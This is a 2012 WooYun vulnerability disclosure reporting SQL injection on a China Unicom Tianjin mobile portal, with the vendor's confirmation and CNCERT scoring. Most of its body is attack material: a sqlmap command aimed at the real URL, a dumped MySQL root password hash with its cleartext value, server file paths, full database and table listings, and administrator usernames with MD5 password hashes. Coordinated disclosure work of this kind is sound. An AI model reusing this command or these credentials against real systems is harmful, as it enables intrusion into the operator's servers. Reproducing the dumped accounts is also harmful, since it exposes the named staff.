当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-06558

漏洞标题:联通分站SQL注入+绝对路径泄漏

相关厂商:联通

漏洞作者: zhk

提交时间:2012-04-30 15:05

修复时间:2012-06-14 15:06

公开时间:2012-06-14 15:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-04-30: 细节已通知厂商并且等待厂商处理中
2012-05-04: 厂商已经确认,细节仅向厂商公开
2012-05-14: 细节向核心白帽子及相关领域专家公开
2012-05-24: 细节向普通白帽子公开
2012-06-03: 细节向实习白帽子公开
2012-06-14: 细节向公众公开

简要描述:

今天上网,想不到跳出那种万恶的劫持广告(连打开谷歌广告都出来,谁信啊!!!)
http://220.249.160.187/200455/20120406092121102.jpg
万恶的联通~
联通沃天津分站SQL注入+配置不当+源码泄漏(一个注入就能做这么多事 -_-! )

详细说明:

联通沃天津分站SQL注入+配置不当导致源码泄漏 ROOT权限
跨库,mysql连接密码泄漏
远程连接、FTP帐号密码泄漏(这些就不发了)
密码都很弱后台就不用说了
http://ln.wap.wo.com.cn/ivod/i/home/VideoType.aspx?cid=88&typename=%E6%97%85%E6%B8%B8

database management system users password hashes:                                                             
[*] root [1]:
    password hash: *EF84B137C6A3870A6F63576AB1B80C2E3E8B5C27
    clear-text password: action


web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0


d:\web\ivod\ivodnew\App_Code\DBTool\DbHelperMySQL.cs
d:\web\ivod\ivodnew\i\home\VideoType.aspx.cs
d:\web\ivod\ivodnew\App_Code\DAL\accessinfo.cs




python sqlmap.py -u 'http://ln.wap.wo.com.cn/ivod/i/home/VideoType.aspx?cid=88&typename=%E6%97%85%E6%B8%B8' --tables --threads=10
d:\web\ivod\ivodnew\i\home\VideoType.aspx
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances                               |
| events_waits_current                         |
| events_waits_history                         |
| events_waits_history_long                    |
| events_waits_summary_by_instance             |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name    |
| file_instances                               |
| file_summary_by_event_name                   |
| file_summary_by_instance                     |
| mutex_instances                              |
| performance_timers                           |
| rwlock_instances                             |
| setup_consumers                              |
| setup_instruments                            |
| setup_timers                                 |
| threads                                      |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| columns_priv                                 |
| db                                           |
| event                                        |
| func                                         |
| general_log                                  |
| help_category                                |
| help_keyword                                 |
| help_relation                                |
| help_topic                                   |
| host                                         |
| ndb_binlog_index                             |
| plugin                                       |
| proc                                         |
| procs_priv                                   |
| proxies_priv                                 |
| servers                                      |
| slow_log                                     |
| tables_priv                                  |
| time_zone                                    |
| time_zone_leap_second                        |
| time_zone_name                               |
| time_zone_transition                         |
| time_zone_transition_type                    |
| user                                         |
+----------------------------------------------+
Database: ishwapv3
[20 tables]
+----------------------------------------------+
| frame_basemodule                             |
| frame_channel                                |
| frame_headphoto                              |
| frame_module                                 |
| frame_moduletemp                             |
| frame_page                                   |
| frame_recommend                              |
| frame_template                               |
| frame_theme                                  |
| mangergroup                                  |
| mangeruser                                   |
| membership_module                            |
| membership_module_usergroup                  |
| membership_usergroup                         |
| membership_usermanage                        |
| module                                       |
| module_usergroup                             |
| tempmodule                                   |
| usergroup                                    |
| usermanage                                   |
+----------------------------------------------+
Database: phonebasedb
[2 tables]
+----------------------------------------------+
| ota                                          |
| uservac                                      |
+----------------------------------------------+
Database: iportal
[102 tables]
+----------------------------------------------+
| `billing-query-log-mobtemp`                  |
| `billing-query-log-temp`                     |
| act_enname                                   |
| aircity                                      |
| airline                                      |
| basemodule                                   |
| beitaifilm                                   |
| beitaifilmphoto                              |
| billinginfo                                  |
| billinginfotemp                              |
| book                                         |
| booktype                                     |
| brand                                        |
| city                                         |
| cyphone                                      |
| editnews                                     |
| enewscontent                                 |
| enewsrule                                    |
| enewstype                                    |
| frame_basemodule                             |
| frame_channel                                |
| frame_headphoto                              |
| frame_module                                 |
| frame_moduletemp                             |
| frame_page                                   |
| frame_recommend                              |
| frame_template                               |
| frame_theme                                  |
| gprslog                                      |
| gprsupday                                    |
| group                                        |
| ipaddress                                    |
| iphonemms                                    |
| iphonemmstype                                |
| iphonenews                                   |
| iphonenewstype                               |
| link                                         |
| linktype                                     |
| mangergroup                                  |
| mangeruser                                   |
| membership_module                            |
| membership_module_usergroup                  |
| membership_usergroup                         |
| membership_usermanage                        |
| mms                                          |
| mmstype                                      |
| module                                       |
| news                                         |
| newspaper                                    |
| newsphoto                                    |
| newsrule                                     |
| newstype                                     |
| page                                         |
| phone                                        |
| productfeeinfo                               |
| proinfo                                      |
| proinfotemp                                  |
| snsfriend                                    |
| snsmyfarm                                    |
| snsotherfarm                                 |
| snsotherfarmo                                |
| snsuser                                      |
| spcount                                      |
| spinfo                                       |
| spinfotemp                                   |
| srvinfo                                      |
| srvinfotemp                                  |
| story                                        |
| storytype                                    |
| subvideo                                     |
| syslog                                       |
| template                                     |
| theme                                        |
| ua                                           |
| ua_bk                                        |
| user                                         |
| usergooglekey                                |
| userkey                                      |
| usermodule                                   |
| usersfav                                     |
| vacguid                                      |
| vaclog                                       |
| vacquery                                     |
| video                                        |
| videotype                                    |
| wap                                          |
| wapfilm                                      |
| wapfilmtype                                  |
| wapgame                                      |
| wapgamenews                                  |
| wapgametype                                  |
| waplink                                      |
| wapmagazine                                  |
| wapmagazinetype                              |
| wapmusic                                     |
| wapmusiciphone                               |
| wapmusiciphonetype                           |
| wapmusictype                                 |
| wapringtones                                 |
| waptype                                      |
| weather                                      |
| yx_farm                                      |
+----------------------------------------------+
Database: iportalv2
[25 tables]
+----------------------------------------------+
| activitycontent                              |
| activitytogather                             |
| christmas                                    |
| christmasv1                                  |
| cupschedule                                  |
| editnews                                     |
| enewscontent                                 |
| enewsrule                                    |
| enewstype                                    |
| mircoblog_ishwap                             |
| mircoblog_user                               |
| module                                       |
| news                                         |
| newsphoto                                    |
| newsrule                                     |
| newsrulebk                                   |
| newstype                                     |
| newstypebk                                   |
| phone                                        |
| photo                                        |
| phototype                                    |
| pushurl                                      |
| sina_user                                    |
| tbl_togather                                 |
| winlist                                      |
+----------------------------------------------+
Database: iportal_res
[11 tables]
+----------------------------------------------+
| active_phoneanswer                           |
| active_phonecharge                           |
| active_phonejf                               |
| active_phonevideo                            |
| christmas                                    |
| news                                         |
| news_address                                 |
| news_array                                   |
| newsrule                                     |
| newstype                                     |
| pushurl                                      |
+----------------------------------------------+
Database: ivod
[34 tables]
+----------------------------------------------+
| accessinfo                                   |
| accessinfo_ao                                |
| accessinfoday                                |
| accessinfowo                                 |
| frame_basemodule                             |
| frame_channel                                |
| frame_headphoto                              |
| frame_module                                 |
| frame_moduletemp                             |
| frame_page                                   |
| frame_recommend                              |
| frame_template                               |
| frame_theme                                  |
| membership_module                            |
| membership_module_usergroup                  |
| membership_usergroup                         |
| membership_usermanage                        |
| user                                         |
| vod_ao                                       |
| vod_business                                 |
| vod_mp4_rule                                 |
| vod_nokiasubvideo                            |
| vod_nokiavtype                               |
| vod_programme                                |
| vod_rtsp_rule                                |
| vod_spdetail                                 |
| vod_subvideo                                 |
| vod_subvideo2                                |
| vod_users                                    |
| vod_uservideo                                |
| vod_video                                    |
| vod_vtype                                    |
| vod_zhuanti                                  |
| vod_zhuantidetail                            |
+----------------------------------------------+
Database: nav
[28 tables]
+----------------------------------------------+
| _msmtype                                     |
| _smshistory                                  |
| _smsinfo                                     |
| _smsinfotemp                                 |
| activeuser                                   |
| daysite                                      |
| daysitetemp                                  |
| dyusertype                                   |
| dywebsite                                    |
| dywebtype                                    |
| mobstyle                                     |
| module                                       |
| module_usergroup                             |
| phone                                        |
| phonestyle                                   |
| product                                      |
| productcontent                               |
| ser_keyword                                  |
| temp_week_stream                             |
| tempdyusertype                               |
| usergroup                                    |
| userlinkinfo                                 |
| usermanage                                   |
| usermylinkinfo                               |
| usermysite                                   |
| useronlineinfo                               |
| userreg                                      |
| users                                        |
+----------------------------------------------+
Database: information_schema
[37 tables]
+----------------------------------------------+
| CHARACTER_SETS                               |
| COLLATIONS                                   |
| COLLATION_CHARACTER_SET_APPLICABILITY        |
| COLUMNS                                      |
| COLUMN_PRIVILEGES                            |
| ENGINES                                      |
| EVENTS                                       |
| FILES                                        |
| GLOBAL_STATUS                                |
| GLOBAL_VARIABLES                             |
| INNODB_CMP                                   |
| INNODB_CMPMEM                                |
| INNODB_CMPMEM_RESET                          |
| INNODB_CMP_RESET                             |
| INNODB_LOCKS                                 |
| INNODB_LOCK_WAITS                            |
| INNODB_TRX                                   |
| KEY_COLUMN_USAGE                             |
| PARAMETERS                                   |
| PARTITIONS                                   |
| PLUGINS                                      |
| PROCESSLIST                                  |
| PROFILING                                    |
| REFERENTIAL_CONSTRAINTS                      |
| ROUTINES                                     |
| SCHEMATA                                     |
| SCHEMA_PRIVILEGES                            |
| SESSION_STATUS                               |
| SESSION_VARIABLES                            |
| STATISTICS                                   |
| TABLES                                       |
| TABLESPACES                                  |
| TABLE_CONSTRAINTS                            |
| TABLE_PRIVILEGES                             |
| TRIGGERS                                     |
| USER_PRIVILEGES                              |
| VIEWS                                        |
+----------------------------------------------+


漏洞证明:

id,Remark,spid,UserGroupID,UserGroupName,UserName,UserPwd
"39","None","0","6","超级管理员","admin","ccfe3b3d896353f66df7448938df844b"
"40","NULL","0","6","超级管理员","tangyn","dc3c7e3515fe5bc059044cf71fa06148"
"47","NULL","0","7","新闻编辑组","zcp","d356a9269128c0bfcc8e368a03299bf6"
"49","NULL","0","6","超级管理员","shadmin","0ae35bcbacc725fac7a8f37f89dc5a5f"


checked,filelevel,groupid,lastip,lasttime,loginnum,password,rnd,salt,styleid,userid,username
"0","0","1","None","1268816372","269","21232f297a57a5a743894a0e4a801fc3","None","None","0","3","admin"
"0","0","1","None","1258596489","144","418c5509e2171d55b0aee5c2ea4442b5","None","None","0","6","lhy"
"0","0","1","None","0","0","d821e448212defd91ac1e67f9653a34d","None","None","0","7","tangy"
"0","0","1","None","0","0","985d3e65da2950f6ace98a37c282d6b4","None","None","0","8","lizf"
"0","0","1","None","1245374253","159","6029a523673ee38dd5e0886fba58e42c","None","None","0","9","changw"
"0","0","1","None","1248245533","82","b95c25d0a3a77517d62b3d8a8c879fc1","None","None","0","10","zhuhj"
"0","0","1","None","0","0","12ad4bfa2c51c1e11144ada507f97d2f","None","None","0","11","chenym"
"0","0","1","None","1268902387","136","dc3c7e3515fe5bc059044cf71fa06148","None","None","0","12","tangyn"
"0","0","1","None","0","0","a6f6cf31ac8d7277e3cfc694ddd1b37a","None","None","0","13","yangxh"
"0","0","1","None","0","0","cc829d2a0239466a608a23d841ff910a","None","None","0","14","lihr"
"0","0","2","None","1268640897","15","21232f297a57a5a743894a0e4a801fc3","None","None","0","16","chenqian"
"0","0","2","None","1243128712","7","21232f297a57a5a743894a0e4a801fc3","None","None","0","17","chenyue"
"0","0","1","None","1244770330","3","a8bc0a253a7b8a6d7f8f3284f1018534","None","None","0","19","xum"

修复方案:

过滤参数,改密码,改配置...
(注:求证书)

版权声明:转载请注明来源 zhk@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2012-05-04 14:25

厂商回复:

CNVD确认漏洞并复现所述过程,转由CNCERT辽宁分中心协调当地联通公司处置。
对漏洞评分如下:
CVSS:(AV:R/AC:L/Au:NR/C:C/A:P/I:P/B:N) score:8.97(最高10分,高危)
即:远程攻击、攻击难度低、不需要用户认证,对机密性造成完全影响,对完整性、可用性造成部分影响。
技术难度系数:1.0(一般,注入)
影响危害系数:1.2(一般,涉及电信行业单位手机门户网站)
CNVD综合评分:8.97*1.0*1.2=10.764

最新状态:

暂无